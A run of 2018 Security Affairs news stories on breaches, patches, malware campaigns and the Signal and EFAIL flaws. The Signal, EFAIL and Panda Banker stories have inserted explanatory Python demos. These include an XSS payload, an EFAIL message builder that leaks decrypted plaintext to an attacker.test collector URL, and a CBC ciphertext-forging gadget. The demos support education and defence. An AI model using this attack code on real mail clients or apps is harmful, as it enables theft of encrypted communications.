
Currently, the Rossotrudnichestvo website is up and active, while the defaced subdomain prev.rs.gov.ru was offline.

Pierluigi Paganini

(Security Affairs – Rossotrudnichestvo, Anonymous)


Rail Europe North America hit by payment card data breach

Rail Europe North America (RENA) notifies customers of a security breach, crooks compromised its website with a malware used to siphon payment card data.

The website allows users to buy European train tickets. According to the company, the data breach lasted at least three months (between November 29, 2017 and February 16, 2018), and the incident also exposed customers’ payment card data.

“Rail Europe North America Inc. (“RENA” or “we”) is writing to let you, as a customer of RENA, know about a recent data security incident that may have involved your credit card or debit card information and other personal information” reads the notice sent by the company to its customers.

“On February 16, 2018, as a result of a query from one of our banks, we discovered that beginning on November 29, 2017, through February 16, 2018, unauthorized persons gained unauthorized access to our ecommerce websites’ IT platform. Upon discovery that this malicious intrusion may have compromised users’ personal information, we immediately cut off from the Internet all compromised servers on February 16, 2018, and engaged information security experts to assist with forensic analysis, system restoration and security hardening”

According to the notice of data breach, hackers accessed registered users’ personal information including name, gender, delivery address, invoicing address, telephone number, email address, credit/debit card number, expiration date and CVV of customers, and, in some cases, username and password.

Rail Europe North America hack

The security breach was discovered after a bank inquiry informed the organization of an attack.

“In this case, however, the hackers were able to affect the front end of the Rail Europe website with ‘skimming’ malware, meaning customers gave payment and other information directly to the hackers through the website,” said Comparitech privacy advocate Paul Bischoff. “While the details haven’t been fully disclosed, the fact that this went on for three months shows a clear lack of security by Rail Europe.”

RENA replaced and rebuilt all compromised systems from known safe code, it also removed any potentially untrusted components. The IT staff changed passwords on all systems and applications, improved security controls and renewed digital certificates.

“RENA has also provided notice to the credit card brands and our credit/debit card transaction processors.” continues the notice.
“In addition, we are offering identity theft protection services through ID Experts®, the data breach and recovery services expert, to provide you with MyIDCare™. MyIDCare services include: 12 months of Credit and CyberScan monitoring, a $1,000,000 insurance reimbursement policy, exclusive educational materials and fully managed id theft recovery services.”

Pierluigi Paganini

(Security Affairs – Rail Europe North America, data breach)


Dutch Government plans to phase out the use of Kaspersky solutions

Dutch Government plans to phase out the use of Kaspersky solutions while the security firm confirmed that its code infrastructure is going to move to Switzerland.

The antivirus firm Kaspersky Lab made the headlines again: the company confirmed that its code infrastructure is going to move to Switzerland. The news arrives just after the Dutch government commented on the risks associated with the use of Kaspersky Lab software.

The Dutch government announced on Monday that it plans to phase out the use of anti-virus software developed by Kaspersky Labs “as a precautionary measure”, and recommended that companies involved in the protection of critical infrastructure do the same.

The Dutch government fears Russia’s aggressive cyber strategy, which targets, among others, the country’s interests.

“In a letter to parliament, Justice Minister Ferdinand Grapperhaus said the decision was made because the Russian government had an “offensive cyber programme that targets among others the Netherlands and Dutch interests”.” reported The New York Times.

“He also said Moscow-based Kaspersky was subject to Russian laws that could oblige it to comply with Russian state interests.”

In response to the accusations from several governments, Kaspersky is moving a number of its core activities from Russia to Switzerland as part of its “Global Transparency Initiative.” It has been estimated that the overall costs of the transfer are $12m.

“The (Dutch) cabinet has carried out an independent review and analysis and made a careful decision on that basis,” Grapperhaus said. “Although there are no concrete cases of misuse known in the Netherlands, it cannot be excluded.”

Grapperhaus explained the Dutch government would consider revising the decision “if circumstances justify” doing so.

The U.S. DHS banned the use of Kaspersky software by the U.S. federal government in 2017, while Kaspersky continues to deny any cooperation with Russian intelligence.

Britain’s National Cyber Security Centre also advises agencies and organizations to avoid using Kaspersky solutions to protect systems that manage classified information.

In December, Lithuania announced it will ban the products of the cybersecurity giant Kaspersky from computers in critical infrastructure.

In April, Twitter banned Kaspersky from advertising on its platform, citing the DHS ban over its alleged ties with Russian intelligence agencies.

Pierluigi Paganini

(Security Affairs – Kaspersky, Dutch Government)


Hackers shared technical details of a Code Injection flaw in Signal App

Researchers shared details of a code injection vulnerability they found in the Signal app for both Windows and Linux systems. The flaw was promptly fixed by Signal.

Signal has fixed a code injection vulnerability in the app for both Windows and Linux systems that was reported by a team of Argentinian experts.

A remote attacker could have exploited the flaw to inject attacker-controlled HTML into the Signal desktop app running on the recipient’s system, without any user interaction, simply by sending the victim a specially crafted link.

The discovery was accidental: the white-hat hackers Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo were chatting on Signal when one of them shared a link to an XSS-vulnerable Argentinian government website.

The experts noticed that the XSS payload was executed on the recipients’ Signal desktop app.

“we were chatting as usual and suddenly Alfredo shows us an XSS in an Argentinian government site (don’t worry, it’s been reported). He was using the Signal add-on for Chrome. Javier and I were using the desktop version, based on the insecure electron framework. As I was reading, something caught my attention: an icon was showing next to the URL, as a “picture not found” icon.” reads a blog post published by the experts.


“I jumped from my chair and warned: “your XSS is triggered in signal-desktop!!”.”


The researchers then focused on XSS in the Signal desktop app and, after further tests, found that the vulnerability lay in the function responsible for handling shared links.

The experts discovered that it is possible to exploit the flaw to inject user-defined HTML/JavaScript code via iFrame, image, video and audio tags.

“We tried different kinds of HTML elements: img, form, script, object, frame, frameset, iframe, sound, video (these last two were funny),” the experts continue. “They all worked, except that CSP blocked the execution of scripts, which halted in some way this attack. However, to abuse this vuln, we could:

  • crash the app with repeated and specially crafted URLs, obtaining segmentation fault/DoS (Alfredo’s app crashed several times but mine didn’t, so we couldn’t reproduce it)
  • send a crafted image in base64 format (we didn’t carry on with this)
  • send a file/phish and execute it with <iframe src=”…”></iframe>
  • have fun with <img>, <audio> and <video> 🙂
An attacker could also exploit the vulnerability to inject a form into the recipient’s chat window, tricking them into providing sensitive information through social engineering.

The experts praised the Signal security team, which fixed the issue on Friday, less than two hours after the report.

Experts explained that the flaw did not allow attackers to execute system commands or gain sensitive information like decryption keys on the recipients’ system.

After Signal fixed the issue, the researchers examined the file’s history and found that the patch validates URLs with a regular expression. That check had existed in the application before and was probably removed by mistake in an April 10 commit that fixed a linking issue. The experts remain wary of relying on that regex and fear it could be bypassed.
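The bug class described above, as an added example that is not Signal’s code: a chat client that turns message text into HTML and lets HTML in the message through, next to a renderer that escapes first and only links URLs it has validated with a real URL parser rather than a regex alone. Message text and hostnames are constructed for the demo.

```python
"""
Added example, not Signal's code: the vulnerable "linkify the raw message"
pattern beside a hardened renderer. Constructed payload and hostnames.
"""
import html
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"']+")

def render_unsafe(text):
    """Vulnerable pattern: treat the message as HTML and just wrap URLs in <a>."""
    return URL_RE.sub(lambda m: f'<a href="{m.group(0)}">{m.group(0)}</a>', text)

def is_safe_link(candidate):
    """Validate with a URL parser: only http(s) with a host becomes a link."""
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(parts.hostname)

def render_safe(text):
    """Escape every byte of the message, then linkify only validated URLs."""
    out, last = [], 0
    for m in URL_RE.finditer(text):
        out.append(html.escape(text[last:m.start()]))
        url = m.group(0)
        if is_safe_link(url):
            safe = html.escape(url, quote=True)
            out.append(f'<a href="{safe}" rel="noopener noreferrer">{safe}</a>')
        else:
            out.append(html.escape(url))
        last = m.end()
    out.append(html.escape(text[last:]))
    return "".join(out)

# Constructed attacker message: an <img> that would load from the attacker's
# host (and run a handler if CSP allowed it) plus an ordinary link the
# recipient should still be able to click.
PAYLOAD = ('check this <img src="https://attacker.test/x.png" onerror="alert(1)"> '
           'https://example.test/doc')
```

With the unsafe renderer the `<img>` tag reaches the DOM untouched, which is exactly the remote-image load the researchers noticed; the safe renderer emits `&lt;img ...` as visible text while the legitimate link still becomes an anchor.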

Despite the flaw, Signal remains one of the most secure choices for encrypted messaging.

Pierluigi Paganini

(Security Affairs – Signal, hacking)

The post Hackers shared technical details of a Code Injection flaw in Signal App appeared first on Security Affairs.

Massive DDoS attack hit the Danish state rail operator DSB

The Danish state rail operator DSB was hit by a massive DDoS cyber attack that paralyzed some operations, including ticketing systems and the communication infrastructure.

The Danish state rail operator DSB was hit by an unprecedented DDoS cyber attack; the company confirmed the attack on Monday and The Local media outlet reported it.

The attack was launched on Sunday; it paralyzed the ticketing system and prevented passengers across the country from buying tickets.

“Tickets purchases via the company’s app, ticket machines, website and in 7-Eleven stores were all out of action due to the issue on Sunday.” reported The Local.

“Passengers with Rejsekort travel cards were able to use that system, while others purchased tickets from ticket inspectors on board trains.”

The state rail operator DSB restored normal operations on Monday morning.

The company’s experts confirmed that the attack came from an external source with the specific intent of disrupting DSB’s operations. The attackers also took the internal mail system and the telephone infrastructure offline, leaving social media as the only channel for communicating with customers.

The train safety was not compromised by hackers, assured the deputy director.

“Our technicians and IT contractors have analysed this closely during the night and have concluded this is an outside attack in which someone has attempted to bring our system down,” DSB vice-director Aske Wieth-Knudsen said.


“We have previously been subjected to an attack and, of course, we have made some processes to avoid this. The type of attack we saw yesterday is a new way of doing it, as we have not seen before. So it needs to be analyzed a bit closer, exactly what has happened so we can prevent it from repeating,” Wieth-Knudsen told DR.

The company is investigating the incident together with Danish authorities and is monitoring the situation to prevent further attacks.

“At this moment in time I have not yet been in contact with anyone. We are still clarifying some messages, since the attack was only resolved during the night,” he told Ritzau.

“Now the day has started we will naturally contact relevant bodies,” he added.

Aske Wieth-Knudsen confirmed that DSB has not paid any ransom in connection with the attack.

Pierluigi Paganini

(Security Affairs – state rail operator DSB, DDoS)

The post Massive DDoS attack hit the Danish state rail operator DSB appeared first on Security Affairs.

Adobe issued security updates for 47 vulnerabilities in Acrobat DC and Reader

On Monday, Adobe issued security updates for 47 vulnerabilities in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017.

Many vulnerabilities are ranked as critical and could be exploited for arbitrary code execution.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and MacOS. These updates address critical vulnerabilities whose successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

Many of the security vulnerabilities were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe addressed the vulnerabilities with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruption bugs that could be exploited to execute arbitrary code in the context of the targeted user, plus many other issues, such as security bypasses and NTLM SSO hash theft, rated “important.”

Adobe has credited independent researchers and experts from Cisco Talos, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, ESET, Kaspersky, Cybellum, and Cure53 for the vulnerabilities in Acrobat and Reader releases.

Adobe announced the end of support for Acrobat and Reader 11.x on October 15, 2017, and that version 11.0.23 is the final release for these products.

Adobe has also released security updates to fix a flaw in the Windows and macOS versions of Photoshop CC.

“Adobe has released updates for Photoshop CC for Windows and macOS. These updates resolve a critical vulnerability in Photoshop CC 19.1.3 and earlier 19.x versions, as well as 18.1.3 and earlier 18.x versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory.


A few days earlier, Adobe had released security updates addressing several vulnerabilities in its products, including Flash Player, Creative Cloud and Connect.

Those updates also addressed a critical code execution vulnerability in Flash Player tracked as CVE-2018-4944, a type confusion bug that could be exploited to execute arbitrary code. Adobe assigned it a priority rating of “2”, meaning the company does not consider the development of exploit code imminent.

Pierluigi Paganini

(Security Affairs – Adobe, cyber security)

The post Adobe issued security updates for 47 vulnerabilities in Acrobat DC and Reader appeared first on Security Affairs.

Researchers disclosed details of EFAIL attacks on PGP and S/MIME tools. Experts believe claims are overblown

EFAIL attacks – Researchers found critical vulnerabilities in PGP and S/MIME tools; until clients are patched, disable or uninstall tools that automatically decrypt PGP-encrypted email.

A few hours ago, I reported the news that security researchers from three universities in Germany and Belgium have found critical vulnerabilities in PGP and S/MIME Tools that could be exploited by attackers to read emails encrypted with OpenPGP and S/MIME.

Pretty Good Privacy (PGP), standardized as OpenPGP, is the open end-to-end encryption standard used to encrypt emails, while S/MIME (Secure/Multipurpose Internet Mail Extensions) is a public-key based standard that allows users to send digitally signed and encrypted emails.

The existence of the vulnerabilities was also confirmed by the Electronic Frontier Foundation (EFF), which recommended that users uninstall PGP and S/MIME email plug-ins until the issues are fixed.

The experts initially planned on disclosing details on Tuesday morning, but they later decided to publicly share their findings due to wrong information circulating online.

The experts disclosed two variants of the attack, dubbed EFAIL. In both scenarios the attacker must first obtain the encrypted emails, for example by compromising the target’s email account or by intercepting traffic in a man-in-the-middle (MitM) position.

“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers.

“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”

The attacker manipulates the ciphertext in the protected emails and sends a modified message containing custom HTML code to the original receiver or sender.


The first technique, dubbed direct exfiltration, exploits implementation flaws in the Apple Mail (iOS and macOS) and Mozilla Thunderbird email clients. The attacker sends the target a specially crafted multipart email with three body parts: attacker-controlled HTML that opens an image tag, the stolen encrypted part, and HTML that closes the tag. When the victim’s client opens and decrypts the email, the plaintext ends up inside the image URL and the client sends it to a server controlled by the attacker.

The direct exfiltration technique could be used against both PGP and S/MIME.
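The three-part layout described above, as an added example that is not the EFAIL researchers’ code: it builds the crafted multipart message with Python’s standard `email` library and contrasts a client that stitches all decrypted parts into one HTML document with one that renders each part on its own. The decryption step is simulated (the stand-in `decrypt()` just returns the constructed plaintext) because the flaw is in rendering, not in the cipher; the collector URL and message text are constructed for the demo.

```python
"""
Added example, not the EFAIL researchers' code: the "direct exfiltration"
message layout and why it leaks. decrypt() is a stand-in for the client's
S/MIME or PGP decryption; hostnames and message text are constructed.
"""
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

COLLECTOR = "https://attacker.test/collect?d="   # attacker's server (constructed)

def _html_part(text):
    part = EmailMessage()
    part.set_content(text, subtype="html")
    return part

def build_direct_exfil(stolen_ciphertext):
    """Wrap a stolen encrypted body between an opening and a closing HTML part."""
    msg = EmailMessage()
    msg["From"] = "colleague@example.test"
    msg["To"] = "victim@example.test"
    msg["Subject"] = "Re: notes"
    msg.make_mixed()
    msg.attach(_html_part('<img src="' + COLLECTOR))      # part 1: opens the tag
    enc = EmailMessage()
    enc.set_content(stolen_ciphertext, maintype="application", subtype="pkcs7-mime")
    msg.attach(enc)                                        # part 2: victim's ciphertext
    msg.attach(_html_part('">'))                           # part 3: closes the tag
    return msg.as_bytes()

def decrypt(ciphertext):
    # Stand-in for real decryption: the demo "ciphertext" is the plaintext itself.
    return ciphertext.decode()

def _render_parts(raw):
    """Yield each body part as HTML, decrypting encrypted parts on the fly."""
    msg = message_from_bytes(raw, policy=policy.default)
    for part in msg.iter_parts():
        if part.get_content_type() == "application/pkcs7-mime":
            yield decrypt(part.get_content())
        elif part.get_content_type() == "text/html":
            yield part.get_content()

def render_naive(raw):
    """Vulnerable client: concatenates all parts into one HTML document."""
    return "".join(_render_parts(raw))

def render_isolated(raw):
    """Safer client: each part is its own document, so attacker HTML cannot
    wrap the decrypted one. Blocking remote content loads is the other half."""
    return list(_render_parts(raw))

def leaked_url(document):
    """The URL an HTML renderer would fetch for an <img> in this document, if any.
    Tabs and newlines are dropped the way a URL parser drops them."""
    m = re.search(r'<img\s+src="([^"]*)"', document, re.S)
    return re.sub(r"[\t\r\n]", "", m.group(1)) if m else None

def demo_direct():
    plaintext = b"Secret: the merger closes on Friday"   # constructed victim message
    raw = build_direct_exfil(plaintext)                  # attacker never needs the key
    return (plaintext.decode(),
            leaked_url(render_naive(raw)),
            [leaked_url(doc) for doc in render_isolated(raw)])
```

In the naive client the image URL becomes the collector address followed by the whole decrypted message, so merely displaying the mail sends the plaintext to the attacker; in the isolated client no part on its own contains a complete `<img src="...">`, so nothing is fetched.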

The second technique, a CBC/CFB gadget attack, exploits weaknesses in the OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689) standards themselves: CBC and CFB ciphertext is malleable, so an attacker who knows one block of plaintext can splice chosen blocks into the ciphertext without the key. The victim must still hold the private key; if it has been lost, the technique cannot be used.

“He then sends the manipulated email to one of the original receivers, or to the original sender. He may hide this by choosing new FROM, DATE and SUBJECT fields, and he may hide the manipulated ciphertext by hiding it within an invisible iFrame. Thus the attack mail the victim receives looks unsuspicious” reads the research paper published by the experts.

“Once he opens the email in his client, the manipulated ciphertext will be decrypted – first the private key of the victim is used to decrypt the session key s, and then this session key is used to decrypt the manipulated ciphertext c. The decrypted plaintext now contains, due to the manipulations, an exfiltration channel (e.g., an HTML hyperlink) that will send the decrypted plaintext as a whole or in parts to the attacker,” researchers wrote in their paper on EFAIL.

The CBC/CFB gadget attack also works against PGP, where the researchers observed a success rate of 33%.
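The ciphertext manipulation the paper describes, as an added example that is not the EFAIL researchers’ code: given only a CBC ciphertext and one known plaintext block (S/MIME bodies begin with a predictable MIME header), the attacker forges a ciphertext that decrypts to chosen blocks, each followed by a garbage block, and then to the original plaintext. A small SHA-256 Feistel network stands in for AES because the gadget relies only on the CBC chaining rule P_i = D(C_i) XOR C_{i-1}, not on the block cipher; key, message and chosen blocks are constructed for the demo.

```python
"""
Added example, not the EFAIL researchers' code: the CBC "gadget". A Feistel
network built from SHA-256 stands in for AES; everything else is generic
CBC. Sample key, message and injected blocks are constructed for the demo.
"""
import hashlib
import os

BLOCK = 16
ROUNDS = 8

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    # Round function: keyed hash truncated to half a block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def block_encrypt(key, block):
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def cbc_encrypt(key, iv, plaintext):
    """PKCS#7-padded CBC; the IV is prepended to the ciphertext."""
    pad = BLOCK - len(plaintext) % BLOCK
    plaintext += bytes([pad]) * pad
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)

def cbc_decrypt_raw(key, data):
    """Decrypt without stripping padding or checking integrity, like a mail
    client that renders whatever comes out (the precondition for EFAIL)."""
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    return b"".join(_xor(block_decrypt(key, blocks[i]), blocks[i - 1])
                    for i in range(1, len(blocks)))

def cbc_gadget(ciphertext, known_first_block, chosen_blocks):
    """Forge, without the key, a ciphertext whose decryption starts with the
    attacker's chosen blocks (each followed by one garbage block) and then
    continues with the original plaintext."""
    c0, c1 = ciphertext[:BLOCK], ciphertext[BLOCK:2 * BLOCK]
    forged = b""
    for chosen in chosen_blocks:
        assert len(chosen) == BLOCK
        # D(c1) = P1 XOR c0, so preceding c1 with x makes it decrypt to `chosen`.
        x = _xor(_xor(c0, known_first_block), chosen)
        forged += x + c1
    return forged + ciphertext          # tail: garbage block, then P1, P2, ...

def demo_gadget():
    key = os.urandom(BLOCK)             # victim's key: never seen by the attacker
    iv = os.urandom(BLOCK)
    # Constructed message; the leading MIME header is the known plaintext block.
    plaintext = b"Content-Type: text/html\r\n\r\nSecret: meeting moved to 9pm"
    ciphertext = cbc_encrypt(key, iv, plaintext)

    known = plaintext[:BLOCK]                                 # "Content-Type: te"
    chosen = [b'<img src="https:', b'//attacker.test/']       # exactly 16 bytes each
    forged = cbc_gadget(ciphertext, known, chosen)
    recovered = cbc_decrypt_raw(key, forged)                  # what the client renders
    return plaintext, chosen, recovered
```

The recovered plaintext reads: chosen block, garbage block, chosen block, garbage block, then the original message. The garbage blocks are why the real attack has to place its injected HTML where random bytes are harmless (inside an attribute or comment) and why the authors report a success rate rather than certainty against compressed PGP data; a modification detection code that the client actually enforces before rendering is what defeats the gadget.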

Test results show the EFAIL attacks work against 25 of 35 tested S/MIME email clients and 10 of 28 tested OpenPGP clients.

“Our analysis shows that EFAIL plaintext exfiltration channels exist for 25 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients.” states the blog post.

“While it is necessary to change the OpenPGP and S/MIME standards to reliably fix these vulnerabilities, Apple Mail, iOS Mail and Mozilla Thunderbird had even more severe implementation flaws allowing direct exfiltration of the plaintext that is technically very easy to execute.” 

Many security experts downplayed the importance of the EFAIL attack techniques explaining that the attacks work only against buggy email clients.

EFAIL attacks can be mitigated by disabling HTML rendering, or at least remote content loading, for incoming emails, and by applying the patches released by email client developers.

Pierluigi Paganini

(Security Affairs – privacy, EFAIL)

The post Researchers disclosed details of EFAIL attacks on PGP and S/MIME tools. Experts believe claims are overblown appeared first on Security Affairs.

PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media

Security firm F5 detailed recently discovered campaigns leveraging the Panda Banker malware to target financial institutions, the largest of them aimed at banks in the US.

Researchers at security firm F5 recently detected several campaigns leveraging the Panda Banker malware to target financial institutions, the largest of them aimed at banks in the US.

In March, security researchers at Arbor Networks discovered a threat actor targeting financial institutions in Japan using the latest variant of the Panda Banker banking malware (aka Zeus Panda, PandaBot).

Panda Banker was first spotted in 2016 by Fox-IT; it borrows code from the Zeus banking Trojan and is sold as a kit on underground forums. In November 2017, the threat actors behind Zeus Panda used black-hat Search Engine Optimization (SEO) to push malicious links into search results, focusing on financial-related keyword queries.

Panda Banker’s main purpose is stealing credentials and account numbers; it steals money from victims through “man in the browser” attacks, injecting content into banking pages as they are displayed.

According to F5, the malware continues to target Japanese institutions and it is also targeting users in the United States, Canada, and Latin America.

“We analyzed four campaigns that were active between February and May of 2018. The three May campaigns are still active at the time of this writing. Two of the four campaigns are acting from the same botnet version but have different targets and different command and control (C&C) servers.” reads the analysis published by F5.

“Panda is still primarily focused on targeting global financial services, but following the worldwide cryptocurrency hype, it has expanded its targets to online cryptocurrency exchanges and brokerage services. Social media, search, email, and adult sites are also being targeted by Panda.”

Experts observed a spike in the activity associated with the malware in February when the malicious code was used to target financial services and cryptocurrency sites in Italy with screenshots rather than webinjects. With this technique, the attackers are able to spy on user interaction at cryptocurrency accounts.

“The Panda configuration we analyzed from February was marked as botnet “onore2.” This campaign leverages the same attack techniques as previously described, and it is able to keylog popular web browsers and VNC in order to hijack user interaction session and steal personal information.” states the analysis.


In May, the experts monitored three different Panda Banker campaigns each focused on different countries.

One of them, tracked by F5 as botnet “2.6.8,” had targets in 8 industries in North America, most of the targets (78%) are US financial organizations.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” says F5.

Experts discovered that the same botnet 2.6.8 is also targeting Japanese financial institutions.

Comparison of the two botnet configurations reveals that when Zeus.Panda targets Japan the operators set the option remove_csp – 1, which strips Content Security Policy (CSP) headers from responses. CSP is a browser security standard for preventing cross-site scripting (XSS), clickjacking and other code injection attacks on an otherwise trusted site; removing the header lets the trojan’s webinjects run on pages that would normally refuse them.
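What the remove_csp option buys the trojan, shown with an added example that is not from F5’s report: a small CSP evaluator, covering the directive fallback and the common source expressions, applied to the same page with and without its header. Policy strings, the bank origin and the webinject host are constructed for the demo.

```python
"""
Added example, not from F5's report: a minimal Content-Security-Policy
evaluator. With the bank's policy present an injected inline script or a
script from the attacker's host is refused; with the header stripped by a
man-in-the-browser trojan nothing stops the webinject. All origins,
policies and hostnames below are constructed.
"""
from urllib.parse import urlsplit

def parse_csp(header):
    """Split a CSP header value into {directive: [source expressions]}."""
    policy = {}
    for raw in header.split(";"):
        tokens = raw.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def _host_matches(pattern, host):
    pattern = pattern.lower()
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return host == pattern

def _source_allowed(sources, src_url, page_origin):
    """Does one directive's source list allow src_url (None means inline)?"""
    if "'none'" in sources:
        return False
    if src_url is None:
        return "'unsafe-inline'" in sources
    url, page = urlsplit(src_url), urlsplit(page_origin)
    for source in sources:
        if source == "'self'":
            if url.scheme == page.scheme and url.hostname == page.hostname:
                return True
        elif source.startswith("'"):
            continue                     # nonces, hashes, other keywords: not modelled
        elif source.endswith(":"):       # scheme source such as https:
            if url.scheme == source[:-1].lower():
                return True
        else:                            # host source, optional scheme and *. wildcard
            expr = urlsplit(source if "://" in source else "//" + source)
            if expr.scheme and expr.scheme != url.scheme:
                continue
            if expr.hostname and _host_matches(expr.hostname, url.hostname or ""):
                return True
    return False

def script_allowed(csp_header, page_origin, src_url=None):
    """True if the page's CSP lets a script load from src_url, or run inline
    when src_url is None. No header at all means no restriction, which is
    exactly what stripping it buys the trojan."""
    if csp_header is None:
        return True
    policy = parse_csp(csp_header)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True
    return _source_allowed(sources, src_url, page_origin)

BANK = "https://online.bank.example"                                   # constructed
BANK_CSP = "default-src 'self'; script-src 'self' https://static.bank.example"
WEBINJECT = "https://inject.attacker.test/panda.js"                     # constructed

def demo_remove_csp():
    """The same banking page before and after the trojan strips its CSP."""
    return {
        "inline_with_csp": script_allowed(BANK_CSP, BANK),
        "webinject_with_csp": script_allowed(BANK_CSP, BANK, WEBINJECT),
        "own_cdn_with_csp": script_allowed(BANK_CSP, BANK, "https://static.bank.example/app.js"),
        "inline_without_csp": script_allowed(None, BANK),
        "webinject_without_csp": script_allowed(None, BANK, WEBINJECT),
    }
```

The evaluator is deliberately partial (no nonces, hashes or path matching), but it is enough to show the asymmetry: a policy blocks both the inline injection and the attacker-hosted script, and the only thing the trojan has to do to neutralize it is drop one response header, which is why the header’s presence is worth monitoring from the server side and in client telemetry.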

This last campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, Google.com, Facebook, Twitter, and a couple of other sites.

The third campaign aimed at financial institutions in Latin America, most of them in Argentina, Colombia, and Ecuador. Like the other attacks, it also targeted social media, search, email, entertainment, and technology providers.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.

Pierluigi Paganini

(Security Affairs – Panda Banker, malware)

The post PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media appeared first on Security Affairs.

Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email

Researchers found critical vulnerabilities in PGP and S/MIME Tools, immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.

If you are one of the users of the email encryption tools Pretty Good Privacy and S/MIME there is an important warning for you.

A group of European security experts has discovered a set of critical vulnerabilities in PGP and S/MIME encryption tools that could reveal your encrypted emails in plaintext, including ones you sent in the past.

Pretty Good Privacy (PGP), standardized as OpenPGP, is the open end-to-end encryption standard used to encrypt emails, while S/MIME (Secure/Multipurpose Internet Mail Extensions) is a public-key based standard that allows users to send digitally signed and encrypted emails.

Sebastian Schinzel, a professor of Computer Security at the Münster University of Applied Sciences, warned that Pretty Good Privacy (PGP) might actually allow “Pretty Grievous P0wnage” due to the vulnerabilities, and the worst news is that there are currently no reliable fixes.

The existence of the vulnerabilities was also confirmed by the Electronic Frontier Foundation (EFF), which recommended that users uninstall PGP and S/MIME email plug-ins until the issues are fixed.

“A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.” reads the blog post published by the EFF. 

“Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.”


The EFF also provided links to guides on how to temporarily disable PGP plug-ins for Thunderbird with Enigmail, Apple Mail with GPGTools, and Outlook with Gpg4win.

“Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email,” states the advisory.

Schinzel will disclose full details on Tuesday morning at 0700 UTC.

Stay tuned!

Pierluigi Paganini

(Security Affairs – privacy, hacking)

The post Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email appeared first on Security Affairs.

Chili’s restaurant chain is the latest victim of a Payment Card Breach

Brinker International warns customers who recently paid with their payment card at a Chili’s restaurant may have had their financial data stolen by crooks.

On May 11, Brinker International company, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries worldwide, announced to have suffered a data breach.

“This notice is to make you aware that some Chili’s restaurants have been impacted by a data incident, which may have resulted in unauthorized access or acquisition of your payment card data, and to provide you information on steps you can take to protect yourself and minimize the possibility of misuse of your information.” reads the notice issued by Brinker.

The company issued a notice warning people who recently used their payment cards at a Chili’s restaurant of a possible data breach; according to the initial investigation, crooks infected payment systems with malware.


Cybercriminals siphoned payment card data from some Chili’s restaurants between March and April 2018. The malicious code was used to harvest credit and debit card numbers as well as cardholder names from PoS systems in the restaurants.

“Based on the details of the issue currently uncovered, we believe that malware was used to gather payment card information including credit or debit card numbers as well as cardholder names from our payment-related systems for in-restaurant purchases at certain Chili’s restaurants. Currently, we believe the data incident was limited to between March – April 2018; however, we continue to assess the scope of the incident.” continues the note.

“Chili’s does not collect certain personal information (such as social security number, full date of birth, or federal or state identification number) from Guests. Therefore, this personal information was not compromised.”

The company highlighted that it does not collect social security numbers, dates of birth or other personal information, it immediately activated the incident response plan and is currently working with third-party forensic experts to investigate the incident.

Brinker advised customers to monitor their bank and credit card statements for any suspicious activity. Customers can visit a web page set up by the company to receive more information on the data breach and updates on this event.

Major restaurant chains are a privileged target for cybercriminals; last year many companies suffered a data breach, including Amazon’s Whole Foods Market, Arby’s, and Chipotle.

Pierluigi Paganini

(Security Affairs – Brinker, Chili’s restaurant data breach)

